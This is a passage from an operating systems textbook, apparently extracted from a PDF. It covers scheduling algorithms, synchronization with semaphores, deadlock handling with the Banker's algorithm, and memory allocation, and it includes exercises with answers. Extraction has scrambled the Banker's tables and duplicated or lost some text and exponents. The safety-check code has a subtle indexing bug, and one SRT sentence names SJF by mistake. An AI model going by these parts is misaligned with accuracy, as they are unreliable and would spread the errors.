Only the shared memory segments are shared between the parent process and the newly
forked child process. Copies of the stack and the heap are made for the newly created
process.
3. The Sun UltraSPARC processor has multiple register sets. Describe the actions of a context
switch if the new context is already loaded into one of the register sets. What else must
happen if the new context is in memory rather than in a register set and all the register sets
are in use?
Answer:
The CPU current-register-set pointer is changed to point to the set containing the new
context, which takes very little time. If the context is in memory, one of the contexts in a
register set must be chosen and be moved to memory, and the new context must be loaded
from memory into the set. This process takes a little more time than on systems with one set
of registers, depending on how a replacement victim is selected.
4. Provide two programming examples in which multithreading provides better performance
than a single-threaded solution.
Answer:
(a) A Web server that services each request in a separate thread.
(b) A parallelized application such as matrix multiplication where different parts of the
matrix may be worked on in parallel.
5. What are the two differences between user-level threads and kernel-level threads? Under
what circumstances is one type better than the other?
Answer:
(a) User-level threads are unknown by the kernel, whereas the kernel is aware of kernel
threads.
24
(b) On systems using either M:1 or M:N mapping, user threads are scheduled by the thread
library and the kernel schedules kernel threads.
(c) Kernel threads need not be associated with a process whereas every user thread belongs
to a process. Kernel threads are generally more expensive to maintain than user threads as
they must be represented with a kernel data structure.
25
4. Process Management
4.1 CPU/Process Scheduling
The assignment of physical processors to processes allows processors to accomplish work. The
problem of determining, when processors should be assigned and to which processes, is called
processor scheduling or CPU scheduling.
When more than one process is runnable, the operating system must decide which one first. The
part of the operating system concerned with this decision is called the scheduler, and algorithm it
uses is called the scheduling algorithm.
Goals of scheduling (objectives). Many objectives must be considered in the design of a
scheduling discipline. In particular, a scheduler should consider fairness, efficiency, response
time, turnaround time, throughput, etc., Some of these goals depends on the system one is using
for example batch system, interactive system or real-time system, etc. but there are also some
goals that are desirable in all systems. These goals are described as below.

Fairness. Fairness is important under all circumstances. A scheduler makes sure that each
process gets its fair share of the CPU and no process can suffer indefinite postponement.
Note that giving equivalent or equal time is not fair. Think of safety control and payroll at a
nuclear plant.

Policy Enforcement. The scheduler has to make sure that system's policy is enforced. For
example, if the local policy is safety then the safety control processes must be able to run
whenever they want to, even if it means delay in payroll processes.

Efficiency. Scheduler should keep the system (or in particular CPU) busy cent percent of the
time when possible. If the CPU and all the Input/Output devices can be kept running all the
time, more work gets done per second than if some components are idle.

Response Time. A scheduler should minimize the response time for interactive user.

Turnaround A scheduler should minimize the time batch users must wait for an output.

Throughput. A scheduler should maximize the number of jobs processed per unit time. A
little thought will show that some of these goals are contradictory. It can be shown that any
scheduling algorithm that favors some class of jobs hurts another class of jobs. The amount
of CPU time available is finite, after all.
26
Preemptive Vs Non-preemptive Scheduling
The Scheduling algorithms can be divided into two categories with respect to how they deal with
clock interrupts.
Non-preemptive Scheduling. A scheduling discipline is non-preemptive if, once a process has
been given the CPU, the CPU cannot be taken away from that process.
Following are some characteristics of non-preemptive scheduling

In non-preemptive system, short jobs are made to wait by longer jobs but the overall
treatment of all processes is fair.

In non-preemptive system, response times are more predictable because incoming high
priority jobs can not displace waiting jobs.

In non-preemptive scheduling, a scheduler executes jobs when a process switches from
running state to the waiting state, and when a process terminates.
Preemptive Scheduling. A scheduling discipline is preemptive if, once a process has been given
the CPU can taken away. The strategy of allowing processes that are logically runable to be
temporarily suspended is called Preemptive Scheduling and it is contrast to the "run to
completion" method.
Scheduling Algorithms
There are many process scheduling algorithms. Some of them are described as below

First-Come-First-Served (FCFS) Scheduling. Other names of this algorithm are: First-InFirst-Out (FIFO), Run-to-Completion, Run-Until-Done. Perhaps, First-Come-First-Served
algorithm is the simplest scheduling algorithm. Processes are dispatched according to their
arrival time on the ready queue. Being a non-preemptive discipline, once a process has a
CPU, it runs to completion. The FCFS scheduling is fair in the formal sense or human sense
of fairness but it is unfair in the sense that long jobs make short jobs wait and unimportant
jobs make important jobs wait. FCFS is more predictable than most of other schemes since it
offers time. FCFS scheme is not useful in scheduling interactive users because it cannot
guarantee good response time. The code for FCFS scheduling is simple to write and
understand. One of the major drawbacks of this scheme is that the average time is often quite
long.
27
The First-Come-First-Served algorithm is rarely used as a master scheme in modern
operating systems but it is often embedded within other schemes.
One of the oldest, simplest, fairest and most widely used algorithms is round robin (RR).
In the round robin scheduling, processes are dispatched in a FIFO manner but are given a
limited amount of CPU time called a time-slice or a quantum.
If a process does not complete before its CPU-time expires, the CPU is preempted and given
to the next process waiting in a queue. The preempted process is then placed at the back of
the ready list.
Round Robin Scheduling is preemptive (at the end of time-slice) therefore it is effective in
time-sharing environments in which the system needs to guarantee reasonable response times
for interactive users.
The only interesting issue with round robin scheme is the length of the quantum. Setting the
quantum too short causes too many context switches and lower the CPU efficiency. On the
other hand, setting the quantum too long may cause poor response time and approximates
FCFS. In any event, the average waiting time under round robin scheduling is often quite
long.

Shortest-Job-First (SJF) Scheduling. Other name of this algorithm is Shortest-ProcessNext (SPN). Shortest-Job-First (SJF) is a non-preemptive discipline in which waiting job (or
process) with the smallest estimated run-time-to-completion is run next. In other words,
when CPU is available, it is assigned to the process that has smallest next CPU burst.
The SJF scheduling is especially appropriate for batch jobs for which the run times are known in
advance. Since the SJF scheduling algorithm gives the minimum average time for a given set of
processes, it is probably optimal.
The SJF algorithm favors short jobs (or processors) at the expense of longer ones. The obvious
problem with SJF scheme is that it requires precise knowledge of how long a job or process will
run, and this information is not usually available. The best SJF algorithm can do is to rely on user
estimates of run times.
In the production environment where the same jobs run regularly, it may be possible to provide
reasonable estimate of run time, based on the past performance of the process. But in the
development environment users rarely know how their program will execute.
28
Like FCFS, SJF is non preemptive therefore, it is not useful in timesharing environment in which
reasonable response time must be guaranteed.

Shortest-Remaining-Time (SRT) Scheduling. The SRT is the preemptive counterpart of
SJF and useful in time-sharing environment.
In SRT scheduling, the process with the smallest estimated run-time to completion is run next,
including new arrivals. In SJF scheme, once a job begins executing, it run to completion. In SJF
scheme, a running process may be preempted by a new arrival process with shortest estimated
run-time.
The algorithm SRT has higher overhead than its counterpart SJF. The SRT must keep track of
the elapsed time of the running process and must handle occasional preemptions.
In this scheme, arrival of small processes will run almost immediately. However, longer jobs
have even longer mean waiting time.

Priority Scheduling. The basic idea is straightforward: each process is assigned a priority,
and priority is allowed to run. Equal-Priority processes are scheduled in FCFS order. The
shortest-Job-First (SJF) algorithm is a special case of general priority scheduling algorithm.
An SJF algorithm is simply a priority algorithm where the priority is the inverse of the
(predicted) next CPU burst. That is, the longer the CPU burst, the lower the priority and vice
versa.
Priority can be defined either internally or externally. Internally defined priorities use some
measurable quantities or qualities to compute priority of a process.
Examples of Internal priorities are Time limits, Memory requirements, File requirements like
for example, number of open files and CPU Vs I/O requirements.
Externally defined priorities are set by criteria that are external to operating system such as the
importance of process, type or amount of funds being paid for computer use, the department
sponsoring the work and Politics.
Priority scheduling can be either preemptive or non preemptive. A preemptive priority algorithm
will preemptive the CPU if the priority of the newly arrival process is higher than the priority of
the currently running process.
29
A non-preemptive priority algorithm will simply put the new process at the head of the ready
queue. A major problem with priority scheduling is indefinite blocking or starvation. A solution
to the problem of indefinite blockage of the low-priority process is aging. Aging is a technique
of gradually increasing the priority of processes that wait in the system for a long period of time.

Multilevel Queue Scheduling. A multilevel queue scheduling algorithm partitions the ready
queue in several separate queues, for instance in a multilevel queue scheduling processes are
permanently assigned to one queues. The processes are permanently assigned to one another,
based on some property of the process, such as Memory size, Process priority and Process
type.
Algorithm choose the process from the occupied queue that has the highest priority, and run that
process either Preemptive or Non-preemptively. Each queue has its own scheduling algorithm or
policy.
Possibility I. If each queue has absolute priority over lower-priority queues then no process in the
queue could run unless the queue for the highest-priority processes were all empty. For example,
in the above figure no process in the batch queue could run unless the queues for system
processes, interactive processes, and interactive editing processes will all empty.
Possibility II. If there is a time slice between the queues then each queue gets a certain amount of
CPU times, which it can then schedule among the processes in its queue. For instance; 80% of
the CPU time to foreground queue using RR and 20% of the CPU time to background queue
using FCFS.
Since processes do not move between queue so, this policy has the advantage of low scheduling
overhead, but it is inflexible.

Multilevel Feedback Queue Scheduling. Multilevel feedback queue-scheduling algorithm
allows a process to move between queues. It uses many ready queues and associate a
different priority with each queue.
The Algorithm chooses to process with highest priority from the occupied queue and run that
process either preemptively or non-preemptively. If the process uses too much CPU time it will
moved to a lower-priority queue. Similarly, a process that wait too long in the lower-priority
queue may be moved to a higher-priority queue may be moved to a highest-priority queue. Note
that this form of aging prevents starvation.
30
For example, a process entering the ready queue is placed in queue 0. If it does not finish within
8 milliseconds time, it is moved to the tail of queue 1. If it does not complete, it is preempted and
placed into queue 2. Processes in queue 2 run on a FCFS basis, only when 2 run on a FCFS basis
queue, only when queue 0 and queue 1 are empty.
4.2 Interprocess Communication
Since processes frequently need to communicate with other processes therefore, there is a need
for a well-structured communication, without using interrupts, among processes.
Race Conditions
In operating systems, processes that are working together share some common storage (main
memory, file etc.) that each process can read and write. When two or more processes are reading
or writing some shared data and the final result depends on who runs precisely when, are called
race conditions. Concurrently executing threads that share data need to synchronize their
operations and processing in order to avoid race condition on shared data. Only one ‘customer’
thread at a time should be allowed to examine and update the shared variable.
Race conditions are also possible in Operating Systems. If the ready queue is implemented as a
linked list and if the ready queue is being manipulated during the handling of an interrupt, then
interrupts must be disabled to prevent another interrupt before the first one completes. If
interrupts are not disabled than the linked list could become corrupt.
Critical Section
Figure 4.1 Critical section
The key to preventing trouble involving shared storage is find some way to prohibit more than
one process from reading and writing the shared data simultaneously. That part of the program
where the shared memory is accessed is called the Critical Section. To avoid race conditions and
flawed results, one must identify codes in Critical Sections in each thread. The characteristic
properties of the code that form a Critical Section are
31

Codes that reference one or more variables in a “read-update-write” fashion while any of
those variables is possibly being altered by another thread.

Codes that alter one or more variables that are possibly being referenced in “read-updatawrite” fashion by another thread.

Codes use a data structure while any part of it is possibly being altered by another thread.

Codes alter any part of a data structure while it is possibly in use by another thread.
Here, the important point is that when one process is executing shared modifiable data in its
critical section, no other process is to be allowed to execute in its critical section. Thus, the
execution of critical sections by the processes is mutually exclusive in time.
Mutual Exclusion
A way of making sure that if one process is using a shared modifiable data, the other processes
will be excluded from doing the same thing.
Formally, while one process executes the shared variable, all other processes desiring to do so at
the same time moment should be kept waiting; when that process has finished executing the
shared variable, one of the processes waiting; while that process has finished executing the
shared variable, one of the processes waiting to do so should be allowed to proceed. In this
fashion, each process executing the shared data (variables) excludes all others from doing so
simultaneously. This is called Mutual Exclusion.
Note that mutual exclusion needs to be enforced only when processes access shared modifiable
data - when processes are performing operations that do not conflict with one another they
should be allowed to proceed concurrently.
Mutual Exclusion Conditions
If we could arrange matters such that no two processes were ever in their critical sections
simultaneously, we could avoid race conditions. We need four conditions to hold to have a good
solution for the critical section problem (mutual exclusion).

No two processes may at the same moment inside their critical sections.

No assumptions are made about relative speeds of processes or number of CPUs.

No process should be outside its critical section should block other processes.
32

No process should wait arbitrary long to enter its critical section.
4.3 Process Synchronization
The mutual exclusion problem is to devise a pre-protocol (or entry protocol) and a post-protocol
(or exist protocol) to keep two or more threads from being in their critical sections at the same
time. Tanenbaum examine proposals for critical-section problem or mutual exclusion problem.
Problem. When one process is updating shared modifiable data in its critical section, no other
process should allowed to enter in its critical section.
Proposal 1 -Disabling Interrupts (Hardware Solution)
Each process disables all interrupts just after entering in its critical section and re-enable all
interrupts just before leaving critical section. With interrupts turned off the CPU could not be
switched to other process. Hence, no other process will enter its critical and mutual exclusion
achieved.
Disabling interrupts is sometimes a useful interrupts is sometimes a useful technique within the
kernel of an operating system, but it is not appropriate as a general mutual exclusion mechanism
for users process. The reason is that it is unwise to give user process the power to turn off
interrupts.
Proposal 2 - Lock Variable (Software Solution)
In this solution, we consider a single, shared, (lock) variable, initially 0. When a process wants to
enter in its critical section, it first test the lock. If lock is 0, the process first sets it to 1 and then
enters the critical section. If the lock is already 1, the process just waits until (lock) variable
becomes 0. Thus, a 0 means that no process in its critical section, and 1 means hold your horses some process is in its critical section.
The flaw in this proposal can be best explained by example. Suppose process A sees that the lock
is 0. Before it can set the lock to 1 another process B is scheduled, runs, and sets the lock to 1.
When the process A runs again, it will also set the lock to 1, and two processes will be in their
critical section simultaneously.
Proposal 3 - Strict Alteration
In this proposed solution, the integer variable 'turn' keeps track of whose turn is to enter the
critical section. Initially, process A inspects turn, finds it to be 0, and enters in its critical section.
33
Process B also finds it to be 0 and sits in a loop continually testing 'turn' to see when it becomes
1.Continuously testing a variable waiting for some value to appear is called the Busy-Waiting.
Taking turns is not a good idea when one of the processes is much slower than the other.
Suppose process 0 finishes its critical section quickly, so both processes are now in their
noncritical section. This situation violates above mentioned condition 3.
Using Systems calls 'sleep' and 'wakeup'
Basically, what above mentioned solution do is this: when a process wants to enter into its
critical section, it checks to see if the entry is allowed. If it is not, the process goes into tight loop
and waits (i.e., start busy waiting) until it is allowed to enter. This approach waste CPU-time.
Now look at some interprocess communication primitives is the pair of steep-wakeup.

Sleep. It is a system call that causes the caller to block, that is, be suspended until some
other process wakes it up.

Wakeup. It is a system call that wakes up the process.
Both 'sleep' and 'wakeup' system calls have one parameter that represents a memory address used
to match up 'sleeps' and 'wakeups'.
The Bounded Buffer Producers and Consumers
The bounded buffer producers and consumers assume that there is a fixed buffer size i.e., a finite
numbers of slots is available.
Statement. To suspend the producers when the buffer is full, to suspend the consumers when the
buffer is empty, and to make sure that only one process at a time manipulates a buffer so there
are no race conditions or lost updates.
As an example how sleep-wakeup system calls are used, consider the producer-consumer
problem also known as bounded buffer problem.
Two processes share a common, fixed-size (bounded) buffer. The producer puts information into
the buffer and the consumer takes information out.
Trouble arises when
34

The producer wants to put a new data in the buffer, but buffer is already full.
Solution: Producer goes to sleep and to be awakened when the consumer has removed
data.

The consumer wants to remove data the buffer but buffer is already empty.
Solution: Consumer goes to sleep until the producer puts some data in buffer and wakes
consumer up.
This approach also leads to same race conditions we have seen in earlier approaches. Race
condition can occur due to the fact that access to 'count' is unconstrained. The essence of the
problem is that a wakeup call, sent to a process that is not sleeping, is lost.
Semaphores
E.W. Dijkstra (1965) abstracted the key notion of mutual exclusion in his concepts of
semaphores.
A semaphore is a protected variable whose value can be accessed and altered only by the
operations P and V and initialization operation called 'Semaphoiinitislize'.
Binary Semaphores can assume only the value 0 or the value 1 counting semaphores also called
general semaphores can assume only nonnegative values.
The P (or wait or sleep or down) operation on semaphores S, written as P(S) or wait (S), operates
as follows:
P(S): IF S > 0
THEN S := S – 1
ELSE (wait on S)
The V (or signal or wakeup or up) operation on semaphore S, written as V(S) or signal (S),
operates as follows:
V(S): IF (one or more process are waiting on S)
THEN (let one of these processes proceed)
ELSE S := S +1
Operations P and V are done as single, indivisible, atomic action. It is guaranteed that once a
semaphore operations has stared, no other process can access the semaphore until operation has
completed. Mutual exclusion on the semaphore, S, is enforced within P(S) and V(S).
35
If several processes attempt a P(S) simultaneously, only one process will be allowed to proceed.
The other processes will be kept waiting, but the implementation of P and V guarantees that
processes will not suffer indefinite postponement. Semaphores solve the lost-wakeup problem.
Producer-Consumer Problem Using Semaphores
The solution to the producer-consumer problem uses three semaphores, namely full, empty and
mutex.
The semaphore 'full' is used for counting the number of slots in the buffer that are full. The
'empty' for counting the number of slots that are empty and semaphore 'mutex' to make sure that
the producer and consumer do not access modifiable shared section of the buffer simultaneously.
Initialization
Set full buffer slots to 0. i.e., semaphore Full = 0.
Set empty buffer slots to N. i.e., semaphore empty = N.
For control access to critical section set mutex to 1. i.e., semaphore mutex = 1.
Producer ( )
WHILE (true)
produce-Item ( );
P (empty);
P (mutex);
enter-Item ( )
V (mutex)
V (full);
36
Consumer ( )
WHILE (true)
P (full)
P (mutex);
remove-Item ( );
V (mutex);
V (empty);
consume-Item (Item)
4.4 Deadlock
A set of process is in a deadlock state if each process in the set is waiting for an event that can be
caused by only another process in the set. In other words, each member of the set of deadlock
processes is waiting for a resource that can be released only by a deadlock process. None of the
processes can run, none of them can release any resources, and none of them can be awakened. It
is important to note that the number of processes and the number and kind of resources possessed
and requested are unimportant.
The resources may be either physical or logical. Examples of physical resources are Printers,
Tape Drivers, Memory Space, and CPU Cycles. Examples of logical resources are Files,
Semaphores, and Monitors.
The simplest example of deadlock is where process 1 has been allocated non-shareable resources
A, say, a tap drive, and process 2 has be allocated non-sharable resource B, say, a printer. Now, if
it turns out that process 1 needs resource B (printer) to proceed and process 2 needs resource A
(the tape drive) to proceed and these are the only two processes in the system, each is blocked
the other and all useful work in the system stops. This situation ifs termed deadlock. The system
is in deadlock state because each process holds a resource being requested by the other process
neither process is willing to release the resource it holds.
Preemptable and Non-preemptable Resources.
Resources come in two flavors: preemptable and non-preemptable. A preemptable resource is
one that can be taken away from the process with no ill effects. Memory is an example of a
preemptable resource. On the other hand, a non-preemptable resource is one that cannot be taken
away from process (without causing ill effect). For example, CD resources are not preemptable
at an arbitrary moment.
Reallocating resources can resolve deadlocks that involve preemptable resources. Deadlocks that
involve non-preemptable resources are difficult to deal with.
37
Dealing with Deadlock Problem
In general, there are four strategies of dealing with deadlock problem:

The Ostrich Approach. Just ignore the deadlock problem altogether.

Deadlock Detection and Recovery. Detect deadlock and, when it occurs, take steps to
recover.

Deadlock Avoidance. Avoid deadlock by careful resource scheduling.

Deadlock Prevention. Prevent deadlock by resource scheduling so as to negate at least
one of the four conditions.
Deadlock Prevention
Havender in his pioneering work showed that since all four of the conditions are necessary for
deadlock to occur, it follows that deadlock might be prevented by denying any one of the
conditions.

Elimination of “Mutual Exclusion” Condition. The mutual exclusion condition must hold
for non-sharable resources. That is, several processes cannot simultaneously share a
single resource. This condition is difficult to eliminate because some resources, such as
the tap drive and printer, are inherently non-shareable. Note that shareable resources like
read-only-file do not require mutually exclusive access and thus cannot be involved in
deadlock.

Elimination of “Hold and Wait” Condition. There are two possibilities for elimination of
the second condition. The first alternative is that a process request be granted all of the
resources it needs at once, prior to execution. The second alternative is to disallow a
process from requesting resources whenever it has previously allocated resources. This
strategy requires that all of the resources a process will need must be requested at once.
The system must grant resources on “all or none” basis. If the complete set of resources
needed by a process is not currently available, then the process must wait until the
complete set is available. While the process waits, however, it may not hold any
resources. Thus the “wait for” condition is denied and deadlocks simply cannot occur.
This strategy can lead to serious waste of resources. For example, a program requiring ten
tap drives must request and receive all ten derives before it begins executing. If the
program needs only one tap drive to begin execution and then does not need the
38
remaining tap drives for several hours. Then substantial computer resources (9 tape
drives) will sit idle for several hours. This strategy can cause indefinite postponement
(starvation). Since not all the required resources may become available at once.

Elimination of “No-preemption” Condition. The non-preemption condition can be
alleviated by forcing a process waiting for a resource that cannot immediately be
allocated to relinquish all of its currently held resources, so that other processes may use
them to finish. Suppose a system does allow processes to hold resources while requesting
additional resources. Consider what happens when a request cannot be satisfied. A
process holds resources a second process may need in order to proceed while second
process may hold the resources needed by the first process. This is a deadlock. This
strategy requires that when a process that is holding some resources is denied a request
for additional resources. The process must release its held resources and, if necessary,
request them again together with additional resources. Implementation of this strategy
denies the “no-preemptive” condition effectively.
When a process releases resources the process may lose all its work to that point. One
serious consequence of this strategy is the possibility of indefinite postponement
(starvation). A process might be held off indefinitely as it repeatedly requests and
releases the same resources.

Elimination of “Circular Wait” Condition. The last condition, the circular wait, can be
denied by imposing a total ordering on all of the resource types and than forcing, all
processes to request the resources in order (increasing or decreasing). This strategy
impose a total ordering of all resources types, and to require that each process requests
resources in a numerical order (increasing or decreasing) of enumeration. With this rule,
the resource allocation graph can never have a cycle.

Now the rule is this: processes can request resources whenever they want to, but all
requests must be made in numerical order. A process may request first printer and then a
tape drive (order: 2, 4), but it may not request first a plotter and then a printer (order: 3,
2). The problem with this strategy is that it may be impossible to find an ordering that
satisfies everyone.
Deadlock Avoidance
39
This approach to the deadlock problem anticipates deadlock before it actually occurs. This
approach employs an algorithm to access the possibility that deadlock could occur and acting
accordingly. This method differs from deadlock prevention, which guarantees that deadlock
cannot occur by denying one of the necessary conditions of deadlock.
If the necessary conditions for a deadlock are in place, it is still possible to avoid deadlock by
being careful when resources are allocated. Perhaps the most famous deadlock avoidance
algorithm, due to Dijkstra [1965], is the Banker’s algorithm.
Banker’s Algorithm
In this analogy, customers are equivalent to processes; units are equivalent to resources like disk
space and Banker is equivalent to the Operating System.
Customers Used
Max
Available Units
Units
A
0
6
B
0
5
10
C
0
4
Table 4.1 Initial state of Banker’s algorithm
D
0
7
In the above figure, we see four customers each of whom has been granted a number of credit
units. The banker reserved only 10 units rather than 22 units to service them. At certain moment,
the situation becomes
Available Units
Customers Used Max
A
1
6
2
B
1
5
C
2
4
Table 4.2 Safe state of Banker’s algorithm
D
4
7
Safe state. The key to a state being safe is that there is at least one way for all users to finish. In
other analogy, the state of the above figure is safe because with 2 units left, the banker can delay
any request except C's, thus letting C finish and release all four resources. With four units in
hand, the banker can let either D or B have the necessary units and so on.
Unsafe State. Consider what would happen if a request from B for one more unit were granted in
the above figure, we would have situation shown in the table below. This is an unsafe state.
If all the customers namely A, B, C, and D asked for their maximum loans, then banker could not
satisfy any of them and we would have a deadlock.
40
Customers Used
A
1
B
2
C
2
D
4
Important Note. It
Max Available Units
6
5
1
Table 4.3 Deadlock in Banker’s algorithm
4
7
is important to note that an unsafe state does not imply the existence or even
the eventual existence a deadlock. What an unsafe state does imply is simply that some
unfortunate sequence of events might lead to a deadlock.
The Banker's algorithm is thus to consider each request as it occurs, and see if granting it leads to
a safe state. If it does, the request is granted, otherwise, it postponed until later. Haberman [1969]
has shown that executing of the algorithm has complexity proportional to N2 where N is the
number of processes and since the algorithm is executed each time a resource request occurs, the
overhead is significant.
Deadlock Detection
Deadlock detection is the process of actually determining that a deadlock exists and identifying
the processes and resources involved in the deadlock.
The basic idea is to check allocation against resource availability for all possible allocation
sequences to determine if the system is in deadlocked state a. Of course, the deadlock detection
algorithm is only half of this strategy. Once a deadlock is detected, there needs to be a way to
recover several alternatives exists:

Temporarily prevent resources from deadlocked processes.

Back off a process to some check point allowing preemption of a needed resource and
restarting the process at the checkpoint later.

Successively kill processes until the system is deadlock free.
These methods are expensive in the sense that each iteration calls the detection algorithm until
the system proves to be deadlock free. The complexity of algorithm is O (N2) where N is the
number of proceeds. Another potential problem is starvation; same process killed repeatedly.
4.5 Implementation
41
Case Study 1. Solaris, Windows XP, and Linux implement multiple locking mechanisms because
these operating systems provide different locking mechanisms depending on the application
developers’ needs. Spinlocks are useful for multiprocessor systems where a thread can run in a
busy-loop (for a short period of time) rather than incurring the overhead of being put in a sleep
queue. Mutexes are useful for locking resources. Solaris 2 uses adaptive mutexes, meaning that
the mutex is implemented with a spin lock on multiprocessor machines. Semaphores and
condition variables are more appropriate tools for synchronization when a resource must be held
for a long period of time, since spinning is inefficient for a long duration.
Case Study 2. Suppose that a system is in an unsafe state. An algorithm an algorithm that shows
the possibility for the processes to complete their execution without entering a deadlock state is
depicted as below.
An unsafe state may not necessarily lead to deadlock; it just means that we cannot guarantee that
deadlock will not occur. Thus, it is possible that a system in an unsafe state may still allow all
processes to complete without deadlock occurring.
Consider the situation where a system has 12 resources allocated among processes P0, P1, and
P2. The resources are allocated according to the following policy:
Process
P0
P1
P2
Max
10
4
9
Current
5
2
3
Need
5
2
6
Table 4.4 Unsafe state may not lead to deadlock
Implementation of the above mentioned scenario is described as below.
for (int i = 0; i < n; i++) {
// first find a thread that can finish
for (int j = 0; j < n; j++) {
if (!finish[j]) {
boolean temp = true;
for (int k = 0; k < m; k++) {
if (need[j][k] > work[k])
temp = false;
}
if (temp) { // if this thread can finish
finish[j] = true;
for (int x = 0; x < m; x++)
work[x] += work[j][x];
}
}
}
}
42
Currently there are two resources available. This system is in an unsafe state as process P1 could
complete, thereby freeing a total of four resources. But we cannot guarantee that processes P0
and P2 can complete. However, it is possible that a process may release resources before
requesting any further. For example, process P2 could release a resource, thereby increasing the
total number of resources to five. This allows process P0 to complete, which would free a total of
nine resources, thereby allowing process P2 to complete as well.
4.6 Exercises
1. A CPU scheduling algorithm determines an order for the execution of its scheduled
processes. Given n processes to be scheduled on one processor, how many possible different
schedules are there? Give a formula in terms of n.
Answer:
n! (n factorial = n × n – 1 × n – 2 × ... × 2 × 1).
2. Define the difference between preemptive and non-preemptive scheduling.
Answer:
Preemptive scheduling allows a process to be interrupted in the midst of its execution, taking
the CPU away and allocating it to another process. Non-preemptive scheduling ensures that a
process relinquishes control of the CPU only when it finishes with its current CPU burst.
3. Suppose that the following processes arrive for execution at the times indicated. Each process
will run the listed amount of time. In answering the questions, use non-preemptive
scheduling and base all decisions on the information you have at the time the decision must
be made.
Process
Arrival Time
Burst Time
P1
0.0
8
P2
0.4
4
P3
1.0
1
Table 4.5 Process scheduling exercise
43
(a) What is the average turnaround time for these processes with the FCFS scheduling
algorithm?
(b) What is the average turnaround time for these processes with the SJF scheduling
algorithm?
(c) The SJF algorithm is supposed to improve performance, but notice that we chose to run
process P1 at time 0 because we did not know that two shorter processes would arrive soon.
Compute what the average turnaround time will be if the CPU is left idle for the first 1 unit
and then SJF scheduling is used. Remember that processes P1 and P2 are waiting during this
idle time, so their waiting time may increase. This algorithm could be known as future
knowledge scheduling.
Answer:
a. 10.53
b. 9.53
c. 6.86
Remember that turnaround time is finishing time minus arrival time, so you have to subtract
the arrival times to compute the turnaround times. FCFS is 11 if you forget to subtract arrival
time.
4. What advantage is there in having different time-quantum sizes on different levels of a
multilevel queuing system?
Answer:
Processes that need more frequent servicing, for instance, interactive processes such as
editors, can be in a queue with a small time quantum. Processes with no need for frequent
servicing can be in a queue with a larger quantum, requiring fewer context switches to
complete the processing, and thus making more efficient use of the computer.
5. Suppose that a scheduling algorithm (at the level of short-term CPU scheduling) favors those
processes that have used the least processor time in the recent past. Why will this algorithm
favor I/O-bound programs and yet not permanently starve CPU-bound programs?
Answer:
It will favor the I/O-bound programs because of the relatively short CPU burst request by
them; however, the CPU-bound programs will not starve because the I/O-bound programs
will relinquish the CPU relatively often to do their I/O.
44
5. Memory Management
5.1 Memory Allocation
We first consider how to manage main (``core'') memory (also called random-access memory
(RAM)). In general, a memory manager provides two operations: Address allocate (int size); and
void deallocate (Address block);
The procedure allocate receives a request for a contiguous block of size bytes of memory and
returns a pointer to such a block. The procedure deallocate releases the indicated block, returning
it to the free pool for reuse. Sometimes a third procedure is also provided, Address
reallocate(Address block, int new_size); which takes an allocated block and changes its size,
either returning part of it to the free pool or extending it to a larger block. It may not always be
possible to grow the block without copying it to a new location, so reallocate returns the new
address of the block.
Memory allocators are used in a variety of situations. In UNIX, each process has a data segment.
There is a system call to make the data segment bigger, but no system call to make it smaller.
Also, the system call is quite expensive. Therefore, there are library procedures (called malloc,
free, and realloc) to manage this space. Only when malloc or realloc runs out of space is it
necessary to make the system call. The C++ operators new and delete are just dressed-up
versions of malloc and free. The Java operator new also uses malloc, and the Java runtime
system calls free when an object is no found to be inaccessible during garbage collection.
The operating system also uses a memory allocator to manage space used for OS data structures
and given to ``user'' processes for their own use. As we saw before, there are several reasons why
we might want multiple processes, such as serving multiple interactive users or controlling
multiple devices. There is also a ``selfish'' reason why the OS wants to have multiple processes
in memory at the same time: to keep the CPU busy. Suppose there are n processes in memory
(this is called the level of multiprogramming) and each process is blocked (waiting for I/O) a
fraction p of the time. In the best case, when they ``take turns'' being blocked, the CPU will be
100% busy provided n(1-p) >= 1. For example, if each process is ready 20% of the time, p = 0.8
and the CPU could be kept completely busy with five processes. Of course, real processes aren't
so cooperative. In the worst case, they could all decide to block at the same time, in which case,
45
the CPU utilization (fraction of the time the CPU is busy) would be only 1 - p (20% in our
example). If each processes decides randomly and independently when to block, the chance that
all n processes are blocked at the same time is only pn, so CPU utilization is 1 - pn. Continuing
our example in which n = 5 and p = 0.8, the expected utilization would be 1 - .85 = 1 - .32768 =
0.67232. In other words, the CPU would be busy about 67% of the time on the average.
Algorithms for Memory Management
Clients of the memory manager keep track of allocated blocks (for now, we will not worry about
what happens when a client ``forgets'' about a block). The memory manager needs to keep track
of the ``holes'' between them. The most common data structure is doubly linked list of holes.
This data structure is called the free list. This free list doesn't actually consume any space (other
than the head and tail pointers), since the links between holes can be stored in the holes
themselves (provided each hole is at least as large as two pointers. To satisfy an allocate(n)
request, the memory manager finds a hole of size at least n and removes it from the list. If the
hole is bigger than n bytes, it can split off the tail of the hole, making a smaller hole, which it
returns to the list. To satisfy a deallocate request, the memory manager turns the returned block
into a ``hole'' data structure and inserts it into the free list. If the new hole is immediately
preceded or followed by a hole, the holes can be coalesced into a bigger hole, as explained
below.
How does the memory manager know how big the returned block is? The usual trick is to put a
small header in the allocated block, containing the size of the block and perhaps some other
information. The allocate routine returns a pointer to the body of the block, not the header, so the
client doesn't need to know about it. The deallocate routine subtracts the header size from its
argument to get the address of the header. The client thinks the block is a little smaller than it
really is. So long as the client ``colors inside the lines'' there is no problem, but if the client has
bugs and scribbles on the header, the memory manager can get completely confused. This is a
frequent problem with malloc in UNIX programs written in C or C++. The Java system uses a
variety of runtime checks to prevent this kind of bug.
To make it easier to coalesce adjacent holes, the memory manager also adds a flag (called a
``boundary tag'') to the beginning and end of each hole or allocated block, and it records the size
of a hole at both ends of the hole.
46
Figure 5.1 Memory allocation
When the block is deallocated, the memory manager adds the size of the block (which is stored
in its header) to the address of the beginning of the block to find the address of the first word
following the block. It looks at the tag there to see if the following space is a hole or another
allocated block. If it is a hole, it is removed from the free list and merged with the block being
freed, to make a bigger hole. Similarly, if the boundary tag preceding the block being freed
indicates that the preceding space is a hole, we can find the start of that hole by subtracting its
size from the address of the block being freed (that's why the size is stored at both ends), remove
it from the free list, and merge it with the block being freed. Finally, we add the new hole back to
the free list. Holes are kept in a doubly-linked list to make it easy to remove holes from the list
when they are being coalesced with blocks being freed.
How does the memory manager choose a hole to respond to an allocate request? At first, it might
seem that it should choose the smallest hole that is big enough to satisfy the request. This
strategy is called best fit. It has two problems. First, it requires an expensive search of the entire
free list to find the best hole (although fancier data structures can be used to speed up the search).
More importantly, it leads to the creation of lots of little holes that are not big enough to satisfy
